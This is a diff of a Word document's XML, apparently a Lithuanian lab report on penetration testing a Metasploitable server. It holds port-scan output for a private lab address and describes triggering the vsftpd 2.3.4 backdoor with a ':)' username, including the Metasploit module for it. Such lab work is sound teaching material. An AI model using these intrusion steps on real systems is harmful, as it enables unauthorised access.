-              <w:rPr>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-                <w:color w:val="FF0000"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b w:val="0"/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>PILDOMA TIK „</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-                <w:color w:val="FF0000"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>Jūsų gautas rezultatas</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b w:val="0"/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>“</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:cnfStyle w:val="010000000000" w:firstRow="0" w:lastRow="1" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-          <w:trHeight w:val="265"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="700" w:type="pct"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:cnfStyle w:val="000010000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="1" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="741" w:type="pct"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>10</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3559" w:type="pct"/>
-            <w:gridSpan w:val="2"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:color w:val="auto"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2746,45 +1217,7 @@
         <w:rPr>
           <w:lang w:val="lt-LT"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tinklo profilis – tai apimtis viso to, ką reikia atlikti. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Laboratorinio metu </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>SKENUOJATE TIK VIENĄ IP</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Šio</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> laboratorinio </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>metu jums apimtį apibrėžia IP adresų grupės, kurios parodo, ko jums negalima tikrinti. Realiame pasaulyje tai gali būti netiksliai apibrėžiama ir jūs turėsite suvokti tai patys.</w:t>
+        <w:t xml:space="preserve">Nuskenuoti „Metasploit“ serverio ip adresą. Gavus duomenis apie tinklą surašyti atidarytus portus surašyti į ataskaitą. Pasinaudojant nuskenuotomis paslaugomis įsilaužti į sistemą. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5167,7 +3600,6 @@
                 <w:rFonts w:eastAsia="MS Mincho"/>
                 <w:lang w:val="lt-LT"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>21/tcp</w:t>
             </w:r>
           </w:p>
@@ -5371,7 +3803,15 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:lang w:val="lt-LT"/>
               </w:rPr>
-              <w:t>aprašantis apsaugotą kliento prisijungimą prie</w:t>
+              <w:t xml:space="preserve">aprašantis apsaugotą kliento </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>prisijungimą prie</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5424,6 +3864,7 @@
                 <w:rFonts w:eastAsia="MS Mincho"/>
                 <w:lang w:val="lt-LT"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>23/tcp</w:t>
             </w:r>
           </w:p>
@@ -6078,9 +4519,11 @@
                 <w:lang w:val="lt-LT"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>NetBios</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> Session</w:t>
             </w:r>
@@ -6194,9 +4637,11 @@
                 <w:lang w:val="lt-LT"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>NetBios</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> Session</w:t>
             </w:r>
@@ -6204,7 +4649,23 @@
               <w:t xml:space="preserve"> Service</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> (naujesnė versija)</w:t>
+              <w:t xml:space="preserve"> (</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>naujesnė</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>versija</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7533,15 +5994,7 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:lang w:val="lt-LT"/>
               </w:rPr>
-              <w:t xml:space="preserve">Trojos arkliai, kurie gali būti vykdomi šiame </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t>prievade: The Thing, Aladino, NetBus, APStrojan.</w:t>
+              <w:t>Trojos arkliai, kurie gali būti vykdomi šiame prievade: The Thing, Aladino, NetBus, APStrojan.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7820,126 +6273,12 @@
       <w:pPr>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc258656090"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:lang w:val="lt-LT"/>
         </w:rPr>
-        <w:t>Metasploit</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>. Programinės įrangos paleidimo ir paieškos pvz.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Paleidimas</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>(arba paleidimas iš /opt/mfs/msfconsole</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Paieškos pvz.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>msf&gt; search sendmail</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="4" w:name="_Toc258656090"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8191,7 +6530,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId18"/>
+                          <a:blip r:embed="rId7"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -8397,170 +6736,170 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:lang w:val="lt-LT"/>
               </w:rPr>
+              <w:t>192.168.177.128</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6497" w:type="dxa"/>
+            <w:tcBorders>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>100000    2   tcp    111  portmapper</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    100000    2   udp    111  portmapper</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    100024    1   udp  48297  status</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    100024    1   tcp  32999  status</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    100003    2   udp   2049  nfs</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    100003    3   udp   2049  nfs</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    100003    4   udp   2049  nfs</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    100021    1   udp  40818  nlockmgr</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>192.168.177.128</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6497" w:type="dxa"/>
-            <w:tcBorders>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>100000    2   tcp    111  portmapper</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    100000    2   udp    111  portmapper</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    100024    1   udp  48297  status</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    100024    1   tcp  32999  status</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    100003    2   udp   2049  nfs</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    100003    3   udp   2049  nfs</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    100003    4   udp   2049  nfs</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    100021    1   udp  40818  nlockmgr</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
               <w:t xml:space="preserve">    100021    3   udp  40818  nlockmgr</w:t>
             </w:r>
           </w:p>
@@ -8815,6 +7154,7 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:lang w:val="lt-LT"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>192.168.177.128</w:t>
             </w:r>
           </w:p>
@@ -9200,7 +7540,6 @@
                 <w:bCs/>
                 <w:lang w:val="lt-LT"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>Atliktas veiksmas</w:t>
             </w:r>
           </w:p>
@@ -9311,7 +7650,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId19"/>
+                          <a:blip r:embed="rId8"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -9408,7 +7747,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId20"/>
+                          <a:blip r:embed="rId9"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -9461,6 +7800,7 @@
                 <w:bCs/>
                 <w:lang w:val="lt-LT"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>m</w:t>
             </w:r>
             <w:r>
@@ -9553,7 +7893,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId21"/>
+                          <a:blip r:embed="rId10"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -9650,7 +7990,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId22"/>
+                          <a:blip r:embed="rId11"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -9747,7 +8087,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId23"/>
+                          <a:blip r:embed="rId12"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -9808,20 +8148,6 @@
           <w:lang w:val="lt-LT"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>(galima pateikti darbalaukio atvaizdą)</w:t>
-      </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -9990,7 +8316,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId24"/>
+                          <a:blip r:embed="rId13"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -10078,7 +8404,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> prieigą naudoja vsftpd, populiarus FTP serveris. Ypač šioje versijoje Backdoor (žr. </w:t>
       </w:r>
-      <w:hyperlink r:id="rId25" w:history="1">
+      <w:hyperlink r:id="rId14" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -10103,14 +8429,7 @@
         <w:rPr>
           <w:lang w:val="lt-LT"/>
         </w:rPr>
-        <w:t xml:space="preserve">ojo prisijungimo yra naudojamas papildomas simbolis ":)" [laimingas veidas] pabaigoje. Backdoor apkrėstoji versija atveria 6200 prieigą (port). Mes galime tai įrodyti su telnet ar naudotis </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Metasploit (žr. http://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor) pagrindų modulis automatiškai jį išnaudoti.</w:t>
+        <w:t>ojo prisijungimo yra naudojamas papildomas simbolis ":)" [laimingas veidas] pabaigoje. Backdoor apkrėstoji versija atveria 6200 prieigą (port). Mes galime tai įrodyti su telnet ar naudotis Metasploit (žr. http://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor) pagrindų modulis automatiškai jį išnaudoti.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10120,20 +8439,6 @@
           <w:lang w:val="lt-LT"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>(galima pateikti darbalaukio atvaizdą)</w:t>
-      </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -10320,7 +8625,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId26"/>
